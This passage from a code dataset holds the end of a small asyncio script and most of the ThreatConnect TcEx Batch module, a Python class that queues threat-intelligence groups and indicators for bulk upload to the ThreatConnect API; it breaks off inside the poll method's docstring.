json.dumps(brokerMessage))\n\n\nif __name__ == '__main__':\n # data_collect()\n loop = asyncio.get_event_loop()\n # tasks = [asyncio.ensure_future(data_collect_ir()), asyncio.ensure_future(data_collect_ir2())]\n tasks = [asyncio.get_event_loop().run_until_complete(data_collect_ir())]\n loop.run_forever()\n print(\"started\")\n ","sub_path":"player2.py","file_name":"player2.py","file_ext":"py","file_size_in_byte":1875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"159312958","text":"\"\"\"ThreatConnect Batch Import Module.\"\"\"\n# standard library\nimport hashlib\nimport json\nimport math\nimport os\nimport re\nimport shelve\nimport time\nimport uuid\nfrom collections import deque\nfrom typing import Optional\n\nfrom .group import (\n Adversary,\n Campaign,\n Document,\n Email,\n Event,\n Group,\n Incident,\n IntrusionSet,\n Report,\n Signature,\n Threat,\n)\nfrom .indicator import (\n ASN,\n CIDR,\n URL,\n Address,\n EmailAddress,\n File,\n Host,\n Indicator,\n Mutex,\n RegistryKey,\n UserAgent,\n custom_indicator_class_factory,\n)\n\n# import local modules for dynamic reference\nmodule = __import__(__name__)\n\n\nclass Batch:\n \"\"\"ThreatConnect Batch Import Module\n\n Args:\n tcex (obj): An instance of TcEx object.\n owner (str): The ThreatConnect owner for Batch action.\n action (str, default:Create): Action for the batch job ['Create', 'Delete'].\n attribute_write_type (str, default:Replace): Write type for Indicator attributes\n ['Append', 'Replace'].\n halt_on_error (bool, default:True): If True any batch error will halt the batch job.\n \"\"\"\n\n def __init__(\n self,\n tcex,\n owner,\n action=None,\n attribute_write_type=None,\n halt_on_error=True,\n playbook_triggers_enabled=None,\n ):\n \"\"\"Initialize Class properties.\"\"\"\n self.tcex = tcex\n self._action = action or 'Create'\n self._attribute_write_type = attribute_write_type or 'Replace'\n self._batch_max_chunk = 5000\n self._halt_on_error = halt_on_error\n self._hash_collision_mode = None\n self._file_merge_mode = None\n self._owner = owner\n self._playbook_triggers_enabled = playbook_triggers_enabled\n\n # shelf settings\n self._group_shelf_fqfn = None\n self._indicator_shelf_fqfn = None\n\n # global overrides on batch/file 
errors\n self._halt_on_batch_error = None\n self._halt_on_file_error = None\n self._halt_on_poll_error = None\n\n # debug/saved flags\n self._saved_xids = None\n self._saved_groups = None # indicates groups shelf file was provided\n self._saved_indicators = None # indicates indicators shelf file was provided\n self.enable_saved_file = False\n\n # default properties\n self._batch_data_count = None\n self._poll_interval = None\n self._poll_interval_times = []\n self._poll_timeout = 3600\n\n # containers\n self._files = {}\n self._groups = None\n self._groups_shelf = None\n self._indicators = None\n self._indicators_shelf = None\n\n # build custom indicator classes\n self._gen_indicator_class()\n\n @property\n def _critical_failures(self): # pragma: no cover\n \"\"\"Return Batch critical failure messages.\"\"\"\n return [\n 'Encountered an unexpected Exception while processing batch job',\n 'would exceed the number of allowed indicators',\n ]\n\n def _gen_indicator_class(self): # pragma: no cover\n \"\"\"Generate Custom Indicator Classes.\"\"\"\n\n for entry in self.tcex.indicator_types_data.values():\n name = entry.get('name')\n class_name = name.replace(' ', '')\n # temp fix for API issue where boolean are returned as strings\n entry['custom'] = self.tcex.utils.to_bool(entry.get('custom'))\n\n if class_name in globals():\n # skip Indicator Type if a class already exists\n continue\n\n # Custom Indicator can have 3 values. Only add the value if it is set.\n value_fields = []\n if entry.get('value1Label'):\n value_fields.append(entry['value1Label'])\n if entry.get('value2Label'):\n value_fields.append(entry['value2Label'])\n if entry.get('value3Label'):\n value_fields.append(entry['value3Label'])\n value_count = len(value_fields)\n\n class_data = {}\n # Add Class for each Custom Indicator type to this module\n custom_class = custom_indicator_class_factory(name, Indicator, class_data, value_fields)\n setattr(module, class_name, custom_class)\n\n # Add Custom Indicator Method\n self._gen_indicator_method(name, custom_class, value_count)\n\n def _gen_indicator_method(self, name, custom_class, value_count): # pragma: no cover\n \"\"\"Dynamically generate custom Indicator methods.\n\n Args:\n name (str): The name of the method.\n custom_class (object): The class to add.\n value_count (int): The number of value parameters to support.\n \"\"\"\n method_name = name.replace(' ', '_').lower()\n\n # Add Method for each Custom Indicator class\n def method_1(value1, xid, **kwargs): # pylint: disable=possibly-unused-variable\n \"\"\"Add Custom Indicator data to Batch object\"\"\"\n indicator_obj = custom_class(value1, xid, **kwargs)\n return self._indicator(indicator_obj)\n\n def method_2(value1, value2, xid, **kwargs): # pylint: disable=possibly-unused-variable\n \"\"\"Add Custom Indicator data to Batch object\"\"\"\n indicator_obj = custom_class(value1, value2, xid, **kwargs)\n return self._indicator(indicator_obj)\n\n def method_3(\n value1, value2, value3, xid, **kwargs\n ): # pylint: disable=possibly-unused-variable\n \"\"\"Add Custom Indicator data to Batch object\"\"\"\n indicator_obj = custom_class(value1, value2, value3, xid, **kwargs)\n return self._indicator(indicator_obj)\n\n method = locals()[f'method_{value_count}']\n setattr(self, method_name, method)\n\n def _group(self, group_data):\n \"\"\"Return previously stored group or new group.\n\n Args:\n group_data (dict|obj): An Group dict or instance of Group object.\n\n Returns:\n dict|obj: The new Group dict/object or the previously stored 
dict/object.\n \"\"\"\n if isinstance(group_data, dict):\n # get xid from dict\n xid = group_data.get('xid')\n else:\n # get xid from object\n xid = group_data.xid\n\n if self.groups.get(xid) is not None:\n # return existing group from memory\n group_data = self.groups.get(xid)\n elif self.groups_shelf.get(xid) is not None:\n # return existing group from shelf\n group_data = self.groups_shelf.get(xid)\n else:\n # store new group\n self.groups[xid] = group_data\n return group_data\n\n def _indicator(self, indicator_data):\n \"\"\"Return previously stored indicator or new indicator.\n\n Args:\n indicator_data (dict|obj): An Indicator dict or instance of Indicator object.\n\n Returns:\n dict|obj: The new Indicator dict/object or the previously stored dict/object.\n\n \"\"\"\n if isinstance(indicator_data, dict):\n # get xid from dict\n xid = indicator_data.get('xid')\n else:\n # get xid from object\n xid = indicator_data.xid\n\n if self.indicators.get(xid) is not None:\n # return existing indicator from memory\n indicator_data = self.indicators.get(xid)\n elif self.indicators_shelf.get(xid) is not None:\n # return existing indicator from shelf\n indicator_data = self.indicators_shelf.get(xid)\n else:\n # store new indicators\n self.indicators[xid] = indicator_data\n return indicator_data\n\n @staticmethod\n def _indicator_values(indicator):\n \"\"\"Process indicators expanding file hashes/custom indicators into multiple entries.\n\n Args:\n indicator (str): \" : \" delimited string\n\n Returns:\n list: The list of indicators split on \" : \".\n \"\"\"\n indicator_list = [indicator]\n if indicator.count(' : ') > 0:\n # handle all multi-valued indicators types (file hashes and custom indicators)\n indicator_list = []\n\n # group 1 - lazy capture everything to first : or end of line\n iregx_pattern = r'^(.*?(?=\\s\\:\\s|$))?'\n iregx_pattern += r'(?:\\s\\:\\s)?' # remove :\n # group 2 - look behind for :, lazy capture everything\n # to look ahead (optional ): or end of line\n iregx_pattern += r'((?<=\\s\\:\\s).*?(?=(?:\\s)?\\:\\s|$))?'\n iregx_pattern += r'(?:(?:\\s)?\\:\\s)?' # remove (optional ):\n # group 3 - look behind for :, lazy capture everything\n # to look ahead end of line\n iregx_pattern += r'((?<=\\s\\:\\s).*?(?=$))?$'\n iregx = re.compile(iregx_pattern)\n\n indicators = iregx.search(indicator)\n if indicators is not None:\n indicator_list = list(indicators.groups())\n\n return indicator_list\n\n @property\n def action(self):\n \"\"\"Return batch action.\"\"\"\n return self._action\n\n @action.setter\n def action(self, action):\n \"\"\"Set batch action.\"\"\"\n self._action = action\n\n def add_group(self, group_data):\n \"\"\"Add a group to Batch Job.\n\n .. code-block:: javascript\n\n {\n \"name\": \"Example Incident\",\n \"type\": \"Incident\",\n \"attribute\": [{\n \"type\": \"Description\",\n \"displayed\": false,\n \"value\": \"Example Description\"\n }],\n \"xid\": \"e336e2dd-5dfb-48cd-a33a-f8809e83e904\",\n \"associatedGroupXid\": [\n \"e336e2dd-5dfb-48cd-a33a-f8809e83e904:58\",\n ],\n \"tag\": [{\n \"name\": \"China\"\n }]\n }\n\n Args:\n group_data (dict): The full Group data including attributes, labels, tags, and\n associations.\n \"\"\"\n return self._group(group_data)\n\n def add_indicator(self, indicator_data):\n \"\"\"Add an indicator to Batch Job.\n\n .. 
code-block:: javascript\n\n {\n \"type\": \"File\",\n \"rating\": 5.00,\n \"confidence\": 50,\n \"summary\": \"53c3609411c83f363e051d455ade78a7\n : 57a49b478310e4313c54c0fee46e4d70a73dd580\n : db31cb2a748b7e0046d8c97a32a7eb4efde32a0593e5dbd58e07a3b4ae6bf3d7\",\n \"associatedGroups\": [\n {\n \"groupXid\": \"e336e2dd-5dfb-48cd-a33a-f8809e83e904\"\n }\n ],\n \"attribute\": [{\n \"type\": \"Source\",\n \"displayed\": true,\n \"value\": \"Malware Analysis provided by external AMA.\"\n }],\n \"fileOccurrence\": [{\n \"fileName\": \"drop1.exe\",\n \"date\": \"2017-03-03T18:00:00-06:00\"\n }],\n \"tag\": [{\n \"name\": \"China\"\n }],\n \"xid\": \"e336e2dd-5dfb-48cd-a33a-f8809e83e904:170139\"\n }\n\n Args:\n indicator_data (dict): The Full Indicator data including attributes, labels, tags,\n and associations.\n \"\"\"\n if indicator_data.get('type') not in ['Address', 'EmailAddress', 'File', 'Host', 'URL']:\n # for custom indicator types the valueX fields are required.\n # using the summary we can build the values\n index = 1\n for value in self._indicator_values(indicator_data.get('summary')):\n indicator_data[f'value{index}'] = value\n index += 1\n if indicator_data.get('type') == 'File':\n # convert custom field name to the appropriate value for batch v2\n size = indicator_data.pop('size', None)\n if size is not None:\n indicator_data['intValue1'] = size\n if indicator_data.get('type') == 'Host':\n # convert custom field name to the appropriate value for batch v2\n dns_active = indicator_data.pop('dnsActive', None)\n if dns_active is not None:\n indicator_data['flag1'] = dns_active\n whois_active = indicator_data.pop('whoisActive', None)\n if whois_active is not None:\n indicator_data['flag2'] = whois_active\n return self._indicator(indicator_data)\n\n def address(self, ip, **kwargs):\n \"\"\"Add Address data to Batch object.\n\n Args:\n ip (str): The value for this Indicator.\n confidence (str, kwargs): The threat confidence for this Indicator.\n date_added (str, kwargs): The date timestamp the Indicator was created.\n last_modified (str, kwargs): The date timestamp the Indicator was last modified.\n rating (str, kwargs): The threat rating for this Indicator.\n xid (str, kwargs): The external id for this Indicator.\n\n Returns:\n obj: An instance of Address.\n \"\"\"\n indicator_obj = Address(ip, **kwargs)\n return self._indicator(indicator_obj)\n\n def adversary(self, name, **kwargs):\n \"\"\"Add Adversary data to Batch object.\n\n Args:\n name (str): The name for this Group.\n date_added (str, kwargs): The date timestamp the Indicator was created.\n xid (str, kwargs): The external id for this Group.\n\n Returns:\n obj: An instance of Adversary.\n \"\"\"\n group_obj = Adversary(name, **kwargs)\n return self._group(group_obj)\n\n def asn(self, as_number, **kwargs):\n \"\"\"Add ASN data to Batch object.\n\n Args:\n as_number (str): The value for this Indicator.\n confidence (str, kwargs): The threat confidence for this Indicator.\n date_added (str, kwargs): The date timestamp the Indicator was created.\n last_modified (str, kwargs): The date timestamp the Indicator was last modified.\n rating (str, kwargs): The threat rating for this Indicator.\n xid (str, kwargs): The external id for this Indicator.\n\n Returns:\n obj: An instance of ASN.\n \"\"\"\n indicator_obj = ASN(as_number, **kwargs)\n return self._indicator(indicator_obj)\n\n @property\n def attribute_write_type(self):\n \"\"\"Return batch attribute write type.\"\"\"\n return self._attribute_write_type\n\n 
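    # Usage sketch (assumption: a configured TcEx instance named `tcex`; job\n    # submission/polling is handled by methods defined later in this module):\n    #   batch = Batch(tcex, owner='MyOrg', action='Create')\n    #   xid = batch.generate_xid(['MyOrg', 'bad-campaign'])\n    #   batch.campaign('bad-campaign', xid=xid)\n    #   batch.address('1.2.3.4', rating='4.0', confidence='75')\n\n    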
@attribute_write_type.setter\n    def attribute_write_type(self, attribute_write_type):\n        \"\"\"Set batch attribute write type.\"\"\"\n        self._attribute_write_type = attribute_write_type\n\n    def campaign(self, name, **kwargs):\n        \"\"\"Add Campaign data to Batch object.\n\n        Args:\n            name (str): The name for this Group.\n            date_added (str, kwargs): The date timestamp the Indicator was created.\n            first_seen (str, kwargs): The first seen datetime expression for this Group.\n            xid (str, kwargs): The external id for this Group.\n\n        Returns:\n            obj: An instance of Campaign.\n        \"\"\"\n        group_obj = Campaign(name, **kwargs)\n        return self._group(group_obj)\n\n    def cidr(self, block, **kwargs):\n        \"\"\"Add CIDR data to Batch object.\n\n        Args:\n            block (str): The value for this Indicator.\n            confidence (str, kwargs): The threat confidence for this Indicator.\n            date_added (str, kwargs): The date timestamp the Indicator was created.\n            last_modified (str, kwargs): The date timestamp the Indicator was last modified.\n            rating (str, kwargs): The threat rating for this Indicator.\n            xid (str, kwargs): The external id for this Indicator.\n\n        Returns:\n            obj: An instance of CIDR.\n        \"\"\"\n        indicator_obj = CIDR(block, **kwargs)\n        return self._indicator(indicator_obj)\n\n    def close(self):\n        \"\"\"Cleanup batch job.\"\"\"\n        self.groups_shelf.close()\n        self.indicators_shelf.close()\n        if self.debug and self.enable_saved_file:\n            fqfn = os.path.join(self.tcex.args.tc_temp_path, 'xids-saved')\n            if os.path.isfile(fqfn):\n                os.remove(fqfn)  # remove previous file to prevent duplicates\n            with open(fqfn, 'w') as fh:\n                for xid in self.saved_xids:\n                    fh.write(f'{xid}\\n')\n        else:\n            # delete saved files\n            if os.path.isfile(self.group_shelf_fqfn):\n                os.remove(self.group_shelf_fqfn)\n            # fixed: the original re-checked group_shelf_fqfn before removing the indicator shelf\n            if os.path.isfile(self.indicator_shelf_fqfn):\n                os.remove(self.indicator_shelf_fqfn)\n\n    @property\n    def data(self):\n        \"\"\"Return the batch data to be sent to the ThreatConnect API.\n\n        **Processing Order:**\n        * Process groups in memory up to max batch size.\n        * Process groups in shelf to max batch size.\n        * Process indicators in memory up to max batch size.\n        * Process indicators in shelf up to max batch size.\n\n        This method will remove the group/indicator from memory and/or shelf.\n        \"\"\"\n        entity_count = 0\n        data = {'group': [], 'indicator': []}\n        # process group data\n        group_data, entity_count = self.data_groups(self.groups, entity_count)\n        data['group'].extend(group_data)\n        if entity_count >= self._batch_max_chunk:\n            return data\n        group_data, entity_count = self.data_groups(self.groups_shelf, entity_count)\n        data['group'].extend(group_data)\n        if entity_count >= self._batch_max_chunk:\n            return data\n\n        # process indicator data\n        indicator_data, entity_count = self.data_indicators(self.indicators, entity_count)\n        data['indicator'].extend(indicator_data)\n        if entity_count >= self._batch_max_chunk:\n            return data\n        indicator_data, entity_count = self.data_indicators(self.indicators_shelf, entity_count)\n        data['indicator'].extend(indicator_data)\n        if entity_count >= self._batch_max_chunk:\n            return data\n        return data\n\n    def data_group_association(self, xid):\n        \"\"\"Return group dict array following all associations.\n\n        Args:\n            xid (str): The xid of the group to retrieve associations.\n\n        Returns:\n            list: A list of group dicts.\n        \"\"\"\n        groups = []\n\n        xids = deque()\n        xids.append(xid)\n\n        while xids:\n            xid = xids.popleft()  # remove current xid\n            group_data = None\n\n            if xid in self.groups:\n                group_data = self.groups.get(xid)\n                del self.groups[xid]\n            elif xid 
in self.groups_shelf:\n                group_data = self.groups_shelf.get(xid)\n                del self.groups_shelf[xid]\n\n            if group_data:\n                group_data = self.data_group_type(group_data)\n                groups.append(group_data)\n                xids.extend(group_data.get('associatedGroupXid', []))\n\n        return groups\n\n    def data_group_type(self, group_data):\n        \"\"\"Return dict representation of group data.\n\n        Args:\n            group_data (dict|obj): The group data dict or object.\n\n        Returns:\n            dict: The group data in dict format.\n        \"\"\"\n        if isinstance(group_data, dict):\n            # process file content\n            file_content = group_data.pop('fileContent', None)\n            if file_content is not None:\n                self._files[group_data.get('xid')] = {\n                    'fileContent': file_content,\n                    'fileName': group_data.get('fileName'),\n                    'type': group_data.get('type'),\n                }\n        else:\n            # process file content\n            if group_data.data.get('type') in ['Document', 'Report']:\n                self._files[group_data.data.get('xid')] = group_data.file_data\n            group_data = group_data.data\n        return group_data\n\n    def data_groups(self, groups, entity_count):\n        \"\"\"Process Group data.\n\n        Args:\n            groups (list): The list of groups to process.\n\n        Returns:\n            list: A list of groups including associations\n        \"\"\"\n        data = []\n        # process group objects\n        # we are converting groups.keys() to a list because the data_group_association function\n        # will be deleting items from the groups dictionary, which would otherwise raise a\n        # \"dictionary changed size during iteration\" error\n        for xid in list(groups.keys()):\n            # get association from group data\n            assoc_group_data = self.data_group_association(xid)\n            data += assoc_group_data\n            entity_count += len(assoc_group_data)\n\n            if entity_count >= self._batch_max_chunk:\n                break\n        return data, entity_count\n\n    def data_indicators(self, indicators, entity_count):\n        \"\"\"Process Indicator data.\"\"\"\n        data = []\n        # process indicator objects\n        for xid, indicator_data in list(indicators.items()):\n            entity_count += 1\n            if isinstance(indicator_data, dict):\n                data.append(indicator_data)\n            else:\n                data.append(indicator_data.data)\n            del indicators[xid]\n            if entity_count >= self._batch_max_chunk:\n                break\n        return data, entity_count\n\n    @property\n    def debug(self):\n        \"\"\"Return debug setting\"\"\"\n        debug = False\n        if os.path.isfile(os.path.join(self.tcex.args.tc_temp_path, 'DEBUG')):\n            debug = True\n        return debug\n\n    def document(self, name, file_name, **kwargs):\n        \"\"\"Add Document data to Batch object.\n\n        Args:\n            name (str): The name for this Group.\n            file_name (str): The name for the attached file for this Group.\n            date_added (str, kwargs): The date timestamp the Indicator was created.\n            file_content (str;method, kwargs): The file contents or callback method to retrieve\n                file content.\n            malware (bool, kwargs): If true the file is considered malware.\n            password (bool, kwargs): If malware is true a password for the zip archive is\n                required.\n            xid (str, kwargs): The external id for this Group.\n\n        Returns:\n            obj: An instance of Document.\n        \"\"\"\n        group_obj = Document(name, file_name, **kwargs)\n        return self._group(group_obj)\n\n    def email(self, name, subject, header, body, **kwargs):\n        \"\"\"Add Email data to Batch object.\n\n        Args:\n            name (str): The name for this Group.\n            subject (str): The subject for this Email.\n            header (str): The header for this Email.\n            body (str): The body for this Email.\n            date_added (str, kwargs): The date timestamp the Indicator was created.\n            from_addr (str, kwargs): The **from** address for this Email.\n            to_addr (str, kwargs): The **to** address for this Email.\n            xid (str, kwargs): The 
external id for this Group.\n\n Returns:\n obj: An instance of Email.\n \"\"\"\n group_obj = Email(name, subject, header, body, **kwargs)\n return self._group(group_obj)\n\n def email_address(self, address, **kwargs):\n \"\"\"Add Email Address data to Batch object.\n\n Args:\n address (str): The value for this Indicator.\n confidence (str, kwargs): The threat confidence for this Indicator.\n date_added (str, kwargs): The date timestamp the Indicator was created.\n last_modified (str, kwargs): The date timestamp the Indicator was last modified.\n rating (str, kwargs): The threat rating for this Indicator.\n xid (str, kwargs): The external id for this Indicator.\n\n Returns:\n obj: An instance of EmailAddress.\n \"\"\"\n indicator_obj = EmailAddress(address, **kwargs)\n return self._indicator(indicator_obj)\n\n @property\n def error_codes(self):\n \"\"\"Return static list of Batch error codes and short description\"\"\"\n return {\n '0x1001': 'General Error',\n '0x1002': 'Permission Error',\n '0x1003': 'JsonSyntax Error',\n '0x1004': 'Internal Error',\n '0x1005': 'Invalid Indicator Error',\n '0x1006': 'Invalid Group Error',\n '0x1007': 'Item Not Found Error',\n '0x1008': 'Indicator Limit Error',\n '0x1009': 'Association Error',\n '0x100A': 'Duplicate Item Error',\n '0x100B': 'File IO Error',\n '0x2001': 'Indicator Partial Loss Error',\n '0x2002': 'Group Partial Loss Error',\n '0x2003': 'File Hash Merge Error',\n }\n\n def errors(self, batch_id, halt_on_error=True):\n \"\"\"Retrieve Batch errors to ThreatConnect API.\n\n .. code-block:: javascript\n\n [{\n \"errorReason\": \"Incident incident-001 has an invalid status.\",\n \"errorSource\": \"incident-001 is not valid.\"\n }, {\n \"errorReason\": \"Incident incident-002 has an invalid status.\",\n \"errorSource\":\"incident-002 is not valid.\"\n }]\n\n Args:\n batch_id (str): The ID returned from the ThreatConnect API for the current batch job.\n halt_on_error (bool, default:True): If True any exception will raise an error.\n \"\"\"\n errors = []\n try:\n r = self.tcex.session.get(f'/v2/batch/{batch_id}/errors')\n # if r.status_code == 404:\n # time.sleep(5) # allow time for errors to be processed\n # r = self.tcex.session.get(f'/v2/batch/{batch_id}/errors')\n self.tcex.log.debug(\n f'Retrieve Errors for ID {batch_id}: status code {r.status_code}, errors {r.text}'\n )\n # self.tcex.log.debug(f'Retrieve Errors URL {r.url}')\n # API does not return correct content type\n if r.ok:\n errors = json.loads(r.text)\n # temporarily process errors to find \"critical\" errors.\n # FR in core to return error codes.\n for error in errors:\n error_reason = error.get('errorReason')\n for error_msg in self._critical_failures:\n if re.findall(error_msg, error_reason):\n self.tcex.handle_error(10500, [error_reason], halt_on_error)\n return errors\n except Exception as e:\n self.tcex.handle_error(560, [e], halt_on_error)\n\n def event(self, name, **kwargs):\n \"\"\"Add Event data to Batch object.\n\n Args:\n name (str): The name for this Group.\n date_added (str, kwargs): The date timestamp the Indicator was created.\n event_date (str, kwargs): The event datetime expression for this Group.\n status (str, kwargs): The status for this Group.\n xid (str, kwargs): The external id for this Group.\n\n Returns:\n obj: An instance of Event.\n \"\"\"\n group_obj = Event(name, **kwargs)\n return self._group(group_obj)\n\n def file(self, md5=None, sha1=None, sha256=None, **kwargs):\n \"\"\"Add File data to Batch object.\n\n .. 
note:: At least one file hash value must be specified.\n\n Args:\n md5 (str, optional): The md5 value for this Indicator.\n sha1 (str, optional): The sha1 value for this Indicator.\n sha256 (str, optional): The sha256 value for this Indicator.\n confidence (str, kwargs): The threat confidence for this Indicator.\n date_added (str, kwargs): The date timestamp the Indicator was created.\n last_modified (str, kwargs): The date timestamp the Indicator was last modified.\n rating (str, kwargs): The threat rating for this Indicator.\n size (str, kwargs): The file size for this Indicator.\n xid (str, kwargs): The external id for this Indicator.\n\n Returns:\n obj: An instance of File.\n\n \"\"\"\n indicator_obj = File(md5, sha1, sha256, **kwargs)\n return self._indicator(indicator_obj)\n\n def file_merge_mode(self, value):\n \"\"\"Set the file merge mode for the entire batch job.\n\n Args:\n value (str): A value of Distribute or Merge.\n \"\"\"\n self._file_merge_mode = value\n\n @property\n def files(self):\n \"\"\"Return dictionary containing all of the file content or callbacks.\"\"\"\n return self._files\n\n @staticmethod\n def generate_xid(identifier=None):\n \"\"\"Generate xid from provided identifiers.\n\n .. Important:: If no identifier is provided a unique xid will be returned, but it will\n not be reproducible. If a list of identifiers is provided they must be\n in the same order to generate a reproducible xid.\n\n Args:\n identifier (list|str): Optional *string* value(s) to be used to make a unique and\n reproducible xid.\n\n \"\"\"\n if identifier is None:\n identifier = str(uuid.uuid4())\n elif isinstance(identifier, list):\n identifier = '-'.join([str(i) for i in identifier])\n identifier = hashlib.sha256(identifier.encode('utf-8')).hexdigest()\n return hashlib.sha256(identifier.encode('utf-8')).hexdigest()\n\n def group(self, group_type, name, **kwargs):\n \"\"\"Add Group data to Batch object.\n\n Args:\n group_type (str): The ThreatConnect defined Group type.\n name (str): The name for this Group.\n date_added (str, kwargs): The date timestamp the Indicator was created.\n xid (str, kwargs): The external id for this Group.\n\n Returns:\n obj: An instance of Group.\n \"\"\"\n group_obj = Group(group_type, name, **kwargs)\n return self._group(group_obj)\n\n @property\n def group_shelf_fqfn(self):\n \"\"\"Return groups shelf fully qualified filename.\n\n For testing/debugging a previous shelf file can be copied into the tc_temp_path directory\n instead of creating a new shelf file.\n \"\"\"\n if self._group_shelf_fqfn is None:\n # new shelf file\n self._group_shelf_fqfn = os.path.join(\n self.tcex.args.tc_temp_path, f'groups-{str(uuid.uuid4())}'\n )\n\n # saved shelf file\n if self.saved_groups:\n self._group_shelf_fqfn = os.path.join(self.tcex.args.tc_temp_path, 'groups-saved')\n return self._group_shelf_fqfn\n\n @property\n def groups(self):\n \"\"\"Return dictionary of all Groups data.\"\"\"\n if self._groups is None:\n # plain dict, but could be something else in future\n self._groups = {}\n return self._groups\n\n @property\n def groups_shelf(self):\n \"\"\"Return dictionary of all Groups data.\"\"\"\n if self._groups_shelf is None:\n self._groups_shelf = shelve.open(self.group_shelf_fqfn, writeback=False)\n return self._groups_shelf\n\n @property\n def halt_on_error(self):\n \"\"\"Return batch halt on error setting.\"\"\"\n return self._halt_on_error\n\n @halt_on_error.setter\n def halt_on_error(self, halt_on_error):\n \"\"\"Set batch halt on error setting.\"\"\"\n 
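# Aside added for illustration (not part of the original file): generate_xid\n # above is reproducible for the same ordered list input, e.g. both of these\n # hypothetical calls return the same sha256-based xid, while calling it with\n # no argument yields a random, non-reproducible value.\n # Batch.generate_xid(['my-owner', 'incident-001'])\n # Batch.generate_xid(['my-owner', 'incident-001'])\n 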
self._halt_on_error = halt_on_error\n\n @property\n def halt_on_batch_error(self):\n \"\"\"Return halt on batch error value.\"\"\"\n return self._halt_on_batch_error\n\n @halt_on_batch_error.setter\n def halt_on_batch_error(self, value):\n \"\"\"Set batch halt on batch error value.\"\"\"\n if isinstance(value, bool):\n self._halt_on_batch_error = value\n\n @property\n def halt_on_file_error(self):\n \"\"\"Return halt on file post error value.\"\"\"\n return self._halt_on_file_error\n\n @halt_on_file_error.setter\n def halt_on_file_error(self, value):\n \"\"\"Set halt on file post error value.\"\"\"\n if isinstance(value, bool):\n self._halt_on_file_error = value\n\n @property\n def halt_on_poll_error(self):\n \"\"\"Return halt on poll error value.\"\"\"\n return self._halt_on_poll_error\n\n @halt_on_poll_error.setter\n def halt_on_poll_error(self, value):\n \"\"\"Set batch halt on poll error value.\"\"\"\n if isinstance(value, bool):\n self._halt_on_poll_error = value\n\n def hash_collision_mode(self, value):\n \"\"\"Set the file hash collision mode for the entire batch job.\n\n Args:\n value (str): A value of Split, IgnoreIncoming, IgnoreExisting, FavorIncoming,\n and FavorExisting.\n \"\"\"\n self._hash_collision_mode = value\n\n def host(self, hostname, **kwargs):\n \"\"\"Add Host data to Batch object.\n\n Args:\n hostname (str): The value for this Indicator.\n confidence (str, kwargs): The threat confidence for this Indicator.\n date_added (str, kwargs): The date timestamp the Indicator was created.\n dns_active (bool, kwargs): If True DNS active is enabled for this indicator.\n last_modified (str, kwargs): The date timestamp the Indicator was last modified.\n rating (str, kwargs): The threat rating for this Indicator.\n whois_active (bool, kwargs): If True WhoIs active is enabled for this indicator.\n xid (str, kwargs): The external id for this Indicator.\n\n Returns:\n obj: An instance of Host.\n \"\"\"\n indicator_obj = Host(hostname, **kwargs)\n return self._indicator(indicator_obj)\n\n def incident(self, name, **kwargs):\n \"\"\"Add Incident data to Batch object.\n\n Args:\n name (str): The name for this Group.\n date_added (str, kwargs): The date timestamp the Indicator was created.\n event_date (str, kwargs): The event datetime expression for this Group.\n status (str, kwargs): The status for this Group.\n xid (str, kwargs): The external id for this Group.\n\n Returns:\n obj: An instance of Incident.\n \"\"\"\n group_obj = Incident(name, **kwargs)\n return self._group(group_obj)\n\n def indicator(self, indicator_type, summary, **kwargs):\n \"\"\"Add Indicator data to Batch object.\n\n Args:\n indicator_type (str): The ThreatConnect defined Indicator type.\n summary (str): The value for this Indicator.\n confidence (str, kwargs): The threat confidence for this Indicator.\n date_added (str, kwargs): The date timestamp the Indicator was created.\n last_modified (str, kwargs): The date timestamp the Indicator was last modified.\n rating (str, kwargs): The threat rating for this Indicator.\n xid (str, kwargs): The external id for this Indicator.\n\n Returns:\n obj: An instance of Indicator.\n \"\"\"\n indicator_obj = Indicator(indicator_type, summary, **kwargs)\n return self._indicator(indicator_obj)\n\n @property\n def indicator_shelf_fqfn(self):\n \"\"\"Return indicator shelf fully qualified filename.\n\n For testing/debugging a previous shelf file can be copied into the tc_temp_path directory\n instead of creating a new shelf file.\n \"\"\"\n if self._indicator_shelf_fqfn 
is None:\n # new shelf file\n self._indicator_shelf_fqfn = os.path.join(\n self.tcex.args.tc_temp_path, f'indicators-{str(uuid.uuid4())}'\n )\n\n # saved shelf file\n if self.saved_indicators:\n self._indicator_shelf_fqfn = os.path.join(\n self.tcex.args.tc_temp_path, 'indicators-saved'\n )\n return self._indicator_shelf_fqfn\n\n @property\n def indicators(self):\n \"\"\"Return dictionary of all Indicator data.\"\"\"\n if self._indicators is None:\n # plain dict, but could be something else in future\n self._indicators = {}\n return self._indicators\n\n @property\n def indicators_shelf(self):\n \"\"\"Return dictionary of all Indicator data.\"\"\"\n if self._indicators_shelf is None:\n self._indicators_shelf = shelve.open(self.indicator_shelf_fqfn, writeback=False)\n return self._indicators_shelf\n\n def intrusion_set(self, name, **kwargs):\n \"\"\"Add Intrusion Set data to Batch object.\n\n Args:\n name (str): The name for this Group.\n date_added (str, kwargs): The date timestamp the Indicator was created.\n xid (str, kwargs): The external id for this Group.\n\n Returns:\n obj: An instance of IntrusionSet.\n \"\"\"\n group_obj = IntrusionSet(name, **kwargs)\n return self._group(group_obj)\n\n def mutex(self, mutex, **kwargs):\n \"\"\"Add Mutex data to Batch object.\n\n Args:\n mutex (str): The value for this Indicator.\n confidence (str, kwargs): The threat confidence for this Indicator.\n date_added (str, kwargs): The date timestamp the Indicator was created.\n last_modified (str, kwargs): The date timestamp the Indicator was last modified.\n rating (str, kwargs): The threat rating for this Indicator.\n xid (str, kwargs): The external id for this Indicator.\n\n Returns:\n obj: An instance of Mutex.\n \"\"\"\n indicator_obj = Mutex(mutex, **kwargs)\n return self._indicator(indicator_obj)\n\n def poll(self, batch_id, retry_seconds=None, back_off=None, timeout=None, halt_on_error=True):\n \"\"\"Poll Batch status to ThreatConnect API.\n\n .. 
